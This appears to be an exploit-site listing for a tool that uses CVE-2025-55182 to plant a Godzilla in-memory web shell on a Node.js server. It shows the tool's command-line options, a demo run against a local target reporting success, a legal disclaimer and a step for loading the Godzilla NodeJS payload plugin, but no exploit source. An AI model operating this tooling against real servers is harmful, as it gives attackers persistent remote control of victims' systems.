Share
## https://sploitus.com/exploit?id=9685F9B1-A413-5FAF-8316-179E6C0B4570
# CVE-2025-55182-GodzillaMemoryShell


## Help
```
Usage: exploit.py [-h] [--proxy PROXY] [--utf16] [--unicode] --key KEY
            --target TARGET

CVE-2025-55182 Godzilla Memoryshell

Options:
  -h, --help       Show this help message and exit
  --proxy PROXY    HTTP proxy address, e.g. http://127.0.0.1:8888
  --utf16          Enable UTF-16 encoding
  --unicode        Enable full Unicode escape encoding
  --key KEY        Godzilla Key
  --target TARGET  Target URL for exp.exploit()
```

## Demo
```
python exploit.py --key 666 --target http://127.0.0.1:3000
This tool is only suitable for conducting security research, vulnerability detection, and related compliance testing on your own systems or explicitly authorized environments within the scope of legal authorization. Any unauthorized, illegal, or infringing penetration, attack, or other improper use of this tool is strictly prohibited. Users must fully understand and abide by the laws and regulations of their jurisdiction before use, ensure that the purpose of use is legal and compliant, and bear full responsibility for all risks and consequences arising from use. The developer assumes no responsibility for the consequences of any unauthorized or improper use. This tool is only intended for use in controlled environments for legitimate purposes. Unauthorized or improper use is strictly prohibited. Users must be aware of applicable laws and regulations before use and ensure that their use is lawful. The developer does not assume any responsibility for any consequences arising from unauthorized or improper use. (Y/N): Y
[*] Exploit successful! [*] Connection headers
	Next-Action: cd3f0c85b158c08a2b113464991810cf2cdfc387
```

Before use, load the GodzillaNodeJsPayload plugin into Godzilla. The key used is the Godzilla key. No password parameter is required during connection.

https://github.com/BeichenDream/GodzillaNodeJsPayload


## References
https://github.com/msanft/CVE-2025-55182